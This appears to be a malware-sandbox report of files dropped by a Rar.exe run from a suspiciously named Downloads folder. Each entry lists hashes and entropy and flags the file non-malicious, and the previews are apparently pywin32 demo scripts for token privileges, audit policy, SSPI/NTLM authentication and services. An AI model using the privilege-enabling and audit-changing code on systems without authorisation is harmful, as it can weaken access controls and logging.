                                                                                                                                                                                      Preview:import os..import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from win32security import (. ACL_REVISION_DS,. CONTAINER_INHERIT_ACE,. DACL_SECURITY_INFORMATION,. GROUP_SECURITY_INFORMATION,. OBJECT_INHERIT_ACE,. OWNER_SECURITY_INFORMATION,. PROTECTED_DACL_SECURITY_INFORMATION,. SACL_SECURITY_INFORMATION,. SE_FILE_OBJECT,.)..## SE_SECURITY_NAME needed to access SACL, SE_RESTORE_NAME needed to change owner to someone other than yourself.new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES.).modified_privs = win32security.AdjustTokenPrivileges(th, 0, new_privs
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2258
                                                                                                                                                                                      Entropy (8bit):5.257866200243561
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:xIhkp2h2hdh8hLhVJhBhh/zznnPkSubzUrxL+5JwcyM2iUrEkI0B:K2cYjK5rJnhJ3nnPkSqwwXwcyMXUIE
                                                                                                                                                                                      MD5:FDFAC9188A86C2D91EC792520151731A
                                                                                                                                                                                      SHA1:CB6EF5643BF3DBCA85EF4001215ABDDECC14D0B3
                                                                                                                                                                                      SHA-256:CDC4E5B7AE77D537E930D42288E2DA434FB5C7AE2E8FCF6F6CAB433E62100228
                                                                                                                                                                                      SHA-512:CB0A01D281A0C9D8E273F0D16D3364BE61A034233485B86471FB466DD4151EFDBE3750FED7BD8EC5DD12C29129EF8B93A873BF878A0D58B3B0A6E35C378EB3CC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:fname = r"h:\tmp.txt"..import ntsecuritycon.import win32api.import win32con.import win32file.import win32security..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", "SeEnableDelegatio
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):965
                                                                                                                                                                                      Entropy (8bit):5.211924428673646
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1dVaWGkiQ+MpbSBWxGftBaIftBNIfWwr12rNn:1ztpSBHBacBN1A2Bn
                                                                                                                                                                                      MD5:ECF5691E717B094357E941118E31434C
                                                                                                                                                                                      SHA1:A6749854996DB82308E0D8C0A3AC1372FC67FF48
                                                                                                                                                                                      SHA-256:E5D33C48D397F60FF60F9A5C6F0425C4FB2A8669320C8D14ACF4F430C239440A
                                                                                                                                                                                      SHA-512:3426EE7152F575B329E24B6F2D7FD5C8044DDBDB3A63108235813F523C77020C0303F5F0ED1F25914BF908648F1183700695C728384B41D2225BE4799D11E80F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import ntsecuritycon.import win32api.import win32file.import win32security..policy_handle = win32security.GetPolicyHandle("rupole", win32security.POLICY_ALL_ACCESS)..event_audit_info = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyAuditEventsInformation.).print(event_audit_info)..new_audit_info = list(event_audit_info[1]).new_audit_info[win32security.AuditCategoryPolicyChange] = (. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE.).new_audit_info[win32security.AuditCategoryAccountLogon] = (. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE.).new_audit_info[win32security.AuditCategoryLogon] = (. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE.)..win32security.LsaSetInformationPolicy(. policy_handle, win32security.PolicyAuditEventsInformation, (1, new_audit_info).)..win32security.LsaClose(policy_handle).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4917
                                                                                                                                                                                      Entropy (8bit):5.272689420786585
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Yrcny/jWiv5k/IDkdU/pqyaai78ziK9DJarxYlf7h8xl:Y+y/jWiv5k/Igwq8x+KumZel
                                                                                                                                                                                      MD5:EF8021AF7913DDA04DDF02F2C0DE7C23
                                                                                                                                                                                      SHA1:00BC54F54DCBB9A5A24DE537941BC25DD4AA7C13
                                                                                                                                                                                      SHA-256:4B7C41345F179C949CB6EF6014B170B85CAEF1E85815AFAD4B6EE702361159AA
                                                                                                                                                                                      SHA-512:38F53067622A35A712FFAFE44472563A9052B822BB370AF6844896792C1A39D0E23797065EFE00EAA9F74614BFDB1B8F9B9A924D0487D4B70F81DE26C83D63AD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32api.import win32con.import win32process.import win32security..## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody.## other than yourself or your primary group. Most admin logins don't have it by default, so.## enabling it may fail.new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivileg
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4392
                                                                                                                                                                                      Entropy (8bit):5.2487634042183835
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Snqrcny/jWiv5k/IDkdAqI08Jarx+LwfGfyh8u:h+y/jWiv5k/IgWqHjjj
                                                                                                                                                                                      MD5:4ABA1E68BAC79456F9C3A0609712D9EB
                                                                                                                                                                                      SHA1:A9D86A09BBCD2AF8380189B71614A22501EE6351
                                                                                                                                                                                      SHA-256:7E1144512E75466D6BE8CE265F88CBB33EB0FB5F3D6EDACEA99F1317A2FF98E1
                                                                                                                                                                                      SHA-512:A0316A045611F4270245766BF712D6378F4BCC38203760834075CE5854D60F95F71B6618C758D455D19DB1C736A7FE8C379D31BFF4F8D449EFC90BB7EC58DDE9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32api.import win32con.import win32process.import win32security..fname, tmp = win32api.GetTempFileName(win32api.GetTempPath(), "tmp").print(fname).## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody.## other than yourself or your primary group. Most admin logins don't have it by default, so.## enabling it may fail.new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4541
                                                                                                                                                                                      Entropy (8bit):5.258881603906181
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Yrcny/jWiv5k/IDkdU/pqygiK9uJarxIn2e7h8HjU:Y+y/jWiv5k/IgwqCKhWjwU
                                                                                                                                                                                      MD5:9DB47F76ED6E8A88CBE1E4B9F23CE295
                                                                                                                                                                                      SHA1:24630AB98FFAF3B001F7F7F85CE9B8265BF53C63
                                                                                                                                                                                      SHA-256:2AD30A8C118FA254D47A4C31E04B5D16524B486A80C7DEB4A9381052B786B0B5
                                                                                                                                                                                      SHA-512:05046DA2645B83997EB094A1FED82D2BFA4E84C2841B4792DAE44933376D1926D1F3B9B96DDE8DD486DCBC1271EB05683D5A57C8528F75128CA43715A74B9A04
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32api.import win32con.import win32process.import win32security..## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody.## other than yourself or your primary group. Most admin logins don't have it by default, so.## enabling it may fail.new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivileg
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3382
                                                                                                                                                                                      Entropy (8bit):5.237699635064882
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:eny/jWmJv5zAS/YIDkh3pkinPPS5hMbo3aA6K8GoQdlTpr:eny/jWiv5k/IDkdHqIE3ai8RWHr
                                                                                                                                                                                      MD5:7DCADEC88612DD294016B68E78555986
                                                                                                                                                                                      SHA1:8944F04FBDDB40F986D6BBC56D91C9458568F2AC
                                                                                                                                                                                      SHA-256:4A6A9531E547F1B37C95633D70C0187C42EC814E8754C1BFA2E49C105CC4953E
                                                                                                                                                                                      SHA-512:50837D9BA259B0F9DF8DC9F82CD3FEFF30952879AF9AEC1E2077E53E8316F5499D119B52309F5D042F543DB0D41368BDC8FA902611CE23B850077FD3FB4170FE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32api.import win32con.import win32process.import win32security..new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_ENABLE_DELEGATION_NAME),. win32con.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5481
                                                                                                                                                                                      Entropy (8bit):4.3341623144023025
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:vWoYyit70UN8J99Vyiu6SuuC+D8d6o1lyEfZVw:Z5it707yiTSFXwd71lyEfZVw
                                                                                                                                                                                      MD5:4FB50CD03A213D9C3696D05DD228F03F
                                                                                                                                                                                      SHA1:F6C604FD9A3B939D350C76623D0556DF412913F3
                                                                                                                                                                                      SHA-256:5F10CB276CCAA10D00FBD01126B316C045DC26D65C2F5F03825D19084D44048D
                                                                                                                                                                                      SHA-512:BC5FB9C1978733BF174E70B8956BEA1641D6B066AEEE499C5212CC55D72B646B4D6AF8A5106AC3F1FC744DC1D0CD5986EDD7EC8BAD1F039BF4E93125612EA179
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".Fetches a URL from a web-server supporting NTLM authentication.eg, IIS...If no arguments are specified, a default of http://localhost/localstart.asp.is used. This script does follow simple 302 redirections, so pointing at the.root of an IIS server is should work.."""..import http.client # sorry, this demo needs 2.3+.import optparse.import urllib.error.import urllib.parse.import urllib.request.from base64 import decodestring, encodestring..from sspi import ClientAuth..options = None # set to optparse options object...def open_url(host, url):. h = http.client.HTTPConnection(host). # h.set_debuglevel(9). h.putrequest("GET", url). h.endheaders(). resp = h.getresponse(). print("Initial response is", resp.status, resp.reason). body = resp.read(). if resp.status == 302: # object moved. url = "/" + resp.msg["location"]. resp.close(). h.putrequest("GET", url). h.endheaders(). resp = h.getresponse(). print("After redire
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2857
                                                                                                                                                                                      Entropy (8bit):5.268166314469273
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:OcDheGUbSo31BtMhZJpu31qkMqwzzqgq0qQGnIHsorrI+JTYnSJY50C+c9wyMDRJ:7eGwBtMbJo1qkMqizqgq0qxnIhrMV0cq
                                                                                                                                                                                      MD5:C903127F2939DF13251320C082311B90
                                                                                                                                                                                      SHA1:6F6DF731BE829317C134B731817939DEBE071A97
                                                                                                                                                                                      SHA-256:F76852F275C183F907DF441FF63A9A53BC48DC725331D3DCAB3848A41A5EA32F
                                                                                                                                                                                      SHA-512:747A8E05304303EF8AAFFF2D46FA3D858967B05DD31BA13CDAE698EFF4E553CE6793303FA65B2C13234874E979A24DF4F587C9A79AF9502388BB4CE83F76202A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A demo of basic SSPI authentication..# There is a 'client' context and a 'server' context - typically these will.# be on different machines (here they are in the same process, but the same.# concepts apply).import sspi.import sspicon.import win32api.import win32security...def lookup_ret_code(err):. for k, v in list(sspicon.__dict__.items()):. if k[0:6] in ("SEC_I_", "SEC_E_") and v == err:. return k...""".pkg_name='Kerberos'.sspiclient=SSPIClient(pkg_name, win32api.GetUserName(), ## target spn is ourself. None, None, ## use none for client name and authentication information for current context. ## u'username', (u'username',u'domain.com',u'passwd'),. sspicon.ISC_REQ_INTEGRITY|sspicon.ISC_REQ_SEQUENCE_DETECT|sspicon.ISC_REQ_REPLAY_DETECT| \. sspicon.ISC_REQ_DELEGATE|sspicon.ISC_REQ_CONFIDENTIALITY|sspicon.ISC_REQ_USE_SESSION_KEY).sspiserver=SSPIServer(pkg_name, None,. sspicon.ASC_REQ_INTEGRITY|sspicon.ASC_REQ_SEQUENCE_DETECT|sspicon.ASC_RE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6361
                                                                                                                                                                                      Entropy (8bit):4.427558647447183
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:M33Chyu7QCY4fZ9VCNasbYWdrdZE+wToisvEo0Wst0mTjg9/Z+RV8X:MCgsuuCNaSY0ZE+ZvQWst0ejgebO
                                                                                                                                                                                      MD5:75D5A35B4EE8B8DC4E4FDD5B5400584B
                                                                                                                                                                                      SHA1:4EE7C6CF3B71822A268672C2405C1509916333DC
                                                                                                                                                                                      SHA-256:9A9AF6C5EF6044CA082AEDE43EBFCEE1917B7DEC1F377323B679F1F2330673DF
                                                                                                                                                                                      SHA-512:5DCBB7B5A989C7D26861BC23D60AA79B014B4A172CD9C4401C8BEFB88A53F8928A83A60CD3813B2ECA2A85676A5A572AFD74FE2A0B43920E76AE74ADF542B217
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A sample socket server and client using SSPI authentication and encryption...You must run with either 'client' or 'server' as arguments. A server must be.running before a client can connect...To use with Kerberos you should include in the client options.--target-spn=username, where 'username' is the user under which the server is.being run...Running either the client or server as a different user can be informative..A command-line such as the following may be useful:.`runas /user:{user} {fqp}\python.exe {fqp}\socket_server.py --wait client|server`..{fqp} should specify the relevant fully-qualified path names...To use 'runas' with Kerberos, the client program will need to.specify --target-spn with the username under which the *server* is running...See the SSPI documentation for more details.."""...import http.client # sorry, this demo needs 2.3+.import optparse.import socketserver.import struct.import traceback..import sspi.import win32api.import win32security..options = None # se
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1128
                                                                                                                                                                                      Entropy (8bit):4.72989402530247
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:JgRTg/scLBkLesqldQsC4WgWNoLIpDbF898iLyxsYkuN4mRe:JGgk6Bzs+dxrvLIxbF898iLyiYHKmA
                                                                                                                                                                                      MD5:7BD62BDDEA1DCCC3865FAA118C757D2C
                                                                                                                                                                                      SHA1:B61E0C8977189AB067449C38D2A1D6284D61C25F
                                                                                                                                                                                      SHA-256:1A3DABD6ED521A3D0D4F9B5C08B888C31F5BCF4279FE8CC7B2C98210F77936F9
                                                                                                                                                                                      SHA-512:4ED8BCE08C20A18110A1FCD97C26CE5B6B1CF82EB755F8F72DE72693742E1726AAA455461139FE30154CD5D4C10723E33097EE33AC1439E62FC7676B73E99668
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Demonstrates how to validate a password..# See also MSKB article Q180548.#.# To use with Kerberos you need to jump through the 'targetspn' hoops...import sys..import win32security.from sspi import ClientAuth, ServerAuth...def validate(username, password, domain=""):. auth_info = username, domain, password. ca = ClientAuth("NTLM", auth_info=auth_info). sa = ServerAuth("NTLM").. data = err = None. while err != 0:. err, data = ca.authorize(data). err, data = sa.authorize(data). # If we get here without exception, we worked!...if __name__ == "__main__":. if len(sys.argv) not in [2, 3, 4]:. print("Usage: %s username [password [domain]]" % (__file__,)). sys.exit(1).. # password and domain are optional!. password = None. if len(sys.argv) >= 3:. password = sys.argv[2]. domain = "". if len(sys.argv) >= 4:. domain = sys.argv[3]. try:. validate(sys.argv[1], password, domain). print("Validated OK").
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2135
                                                                                                                                                                                      Entropy (8bit):4.562211316978868
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:A07kBblOiMGpg1DMjtqyNycLNH7aJEywPfo4E4tLgO8M:A07kBZOFSgQsyRLZC4osgO8M
                                                                                                                                                                                      MD5:4F13CA50A137FD86C6F22E1F0082970F
                                                                                                                                                                                      SHA1:5E24BA918FFD189703DC09360460C870B6C9E9A7
                                                                                                                                                                                      SHA-256:2970786059E4DB3E95D38D38A6BBF6A16D4E520FE077BF8D86582106673A20B7
                                                                                                                                                                                      SHA-512:8BCFDA29A39851B622DCA268474F1FCB61E3E7C66FE3980D314B57A956BB72CFA324BE19F82F5D8D6F193A17571B91B09D91D7100D899D587890FEABE146990A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is an example of a service hosted by python.exe rather than.# pythonservice.exe...# Note that it is very rare that using python.exe is a better option.# than the default pythonservice.exe - the latter has better error handling.# so that if Python itself can't be initialized or there are very early.# import errors, you will get error details written to the event log. When.# using python.exe instead, you are forced to wait for the interpreter startup.# and imports to succeed before you are able to effectively setup your own.# error handling...# So in short, please make sure you *really* want to do this, otherwise just.# stick with the default...import os.import sys..import servicemanager.import win32serviceutil.from pipeTestService import TestPipeService...class NativeTestPipeService(TestPipeService):. _svc_name_ = "PyNativePipeTestService". _svc_display_name_ = "Python Native Pipe Test Service". _svc_description_ = "Tests Python.exe hosted services". # tell win32serv
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6893
                                                                                                                                                                                      Entropy (8bit):4.585752418885161
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:C7hRuRwOeqkUJcSC8dccc6sfQ0ulF8C8twh7KPAcCLp/2cAdqOJ:C+y/ocSC8Kcc6MQX7jFKPAHuPdPJ
                                                                                                                                                                                      MD5:B21995DADB96151A3178C89778F5821F
                                                                                                                                                                                      SHA1:592856A829A06EB302353B70E7B0999F50A885EC
                                                                                                                                                                                      SHA-256:6EA910AC3A4B58C77F4B312753F894367DCA3FADB5A23D1F70A60526CA7F1133
                                                                                                                                                                                      SHA-512:1AD8A118582AB2D8CD145B219347F0216E2FB73AF3ACC57DD25E1EB8074D7D81C3599C5DA864F26686688E142DEAF74AC7F18435483F10B7DDC4C97FD70EB42B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A Demo of services and named pipes...# A multi-threaded service that simply echos back its input...# * Install as a service using "pipeTestService.py install".# * Use Control Panel to change the user name of the service.# to a real user name (ie, NOT the SystemAccount).# * Start the service..# * Run the "pipeTestServiceClient.py" program as the client pipe side...import _thread.import traceback..# Old versions of the service framework would not let you import this.# module at the top-level. Now you can, and can check 'Debugging()' and.# 'RunningAsService()' to check your context..import pywintypes.import servicemanager.import win32con.import win32service.import win32serviceutil.import winerror.from ntsecuritycon import *.from win32api import *..# Use "import *" to keep this looking as much as a "normal" service.# as possible. Real code shouldn't do this..from win32event import *.from win32file import *.from win32pipe import *...def ApplyIgnoreError(fn, args):. try:. ret
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4481
                                                                                                                                                                                      Entropy (8bit):4.484804480076562
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:mRjd2OzAT63NFgwgihr8rbSw3SFm05GN8EVE6i:mRjE0f3D7h+b13Il52vVE6i
                                                                                                                                                                                      MD5:40792A85E480392D45275CF67BE01422
                                                                                                                                                                                      SHA1:9CBD58C86FC710B6C4CEC25B375503C445F92256
                                                                                                                                                                                      SHA-256:B4A535554E7553743175B46A37DD038F01A32ACFF72D965C8EDC72AEE7676C06
                                                                                                                                                                                      SHA-512:E82BB319609EADDFFE0491149F2F37CE227A9CC7D74845482F0BF8FA694C3E0A0E8A360EE87057AF08D71945E55E3D1D1E334A9171E58E100142A2643E96617B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A Test Program for pipeTestService.py.#.# Install and start the Pipe Test service, then run this test.# either from the same machine, or from another using the "-s" param..#.# Eg: pipeTestServiceClient.py -s server_name Hi There.# Should work...import os.import sys.import traceback..import pywintypes.import win32api.import winerror.from win32event import *.from win32file import *.from win32pipe import *..verbose = 0..# def ReadFromPipe(pipeName):.# Could (Should?) use CallNamedPipe, but this technique allows variable size.# messages (whereas you must supply a buffer size for CallNamedPipe!.# hPipe = CreateFile(pipeName, GENERIC_WRITE, 0, None, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0).# more = 1.# while more:.# hr = ReadFile(hPipe, 256).# if hr==0:.# more = 0.# except win32api.error (hr, fn, desc):.# if hr==winerror.ERROR_MORE_DATA:.# data = dat.#...def
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4075
                                                                                                                                                                                      Entropy (8bit):4.913580202147345
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:VGAe4yOAJf2klecrcxNokZs9eW8cpkYQQzQ/G3p3f5VF1cTIl5QXoJsbw:Yayffr06k29QcGNHO1/F1cm5K+Iw
                                                                                                                                                                                      MD5:1736FD061AD70B0C9452E0EB63E7699E
                                                                                                                                                                                      SHA1:75BE37D779E98DC848215BF5CA9A34B98071BD39
                                                                                                                                                                                      SHA-256:5C6BB64EA8E1BF7B7011C6464E90ACB155F3C88AD1EDEEE520DC528571E815C1
                                                                                                                                                                                      SHA-512:B9058CC59105489A0C6FA86AF15CDD07FC8F765033446CE0649667A62599656CCDA556B7444963812930DB01357DB03F9F8DB6A404D3AB7FED889B9147AB4783
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A Demo of a service that takes advantage of the additional notifications.# available in later Windows versions...# Note that all output is written as event log entries - so you must install.# and start the service, then look at the event log for messages as events.# are generated...# Events are generated for USB device insertion and removal, power state.# changes and hardware profile events - so try putting your computer to.# sleep and waking it, inserting a memory stick, etc then check the event log..# Most event notification support lives around win32gui.import servicemanager.import win32con.import win32event.import win32gui.import win32gui_struct.import win32service.import win32serviceutil..GUID_DEVINTERFACE_USB_DEVICE = "{A5DCBF10-6530-11D2-901F-00C04FB951ED}"...class EventDemoService(win32serviceutil.ServiceFramework):. _svc_name_ = "PyServiceEventDemo". _svc_display_name_ = "Python Service Event Demo". _svc_description_ = (. "Demonstrates a Python service which
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2193
                                                                                                                                                                                      Entropy (8bit):4.521126122680342
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:xgD61DVymdypV5MjDABsHOPvKXQ6HOIuc4bqFhc7EfjhNm2on:Q615ndypMDABUOPPvI4eFeALhk2on
                                                                                                                                                                                      MD5:CD4A7FC5E4FD347037BB7256850B9B56
                                                                                                                                                                                      SHA1:2CE36FC7871F79810038D810613F5A4D796D17CA
                                                                                                                                                                                      SHA-256:9628F439FEABE60861DC4EDF838164A81500628FD70D9A43444B08CF50F55CDB
                                                                                                                                                                                      SHA-512:D82B58C53C992430214909CF7F0E4F74BA711E76578A54457AFC805C11B591286FFFEB58EDE69A04E0A6F8063631E9062A234019E32A1828F9CDC8363AB6556B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
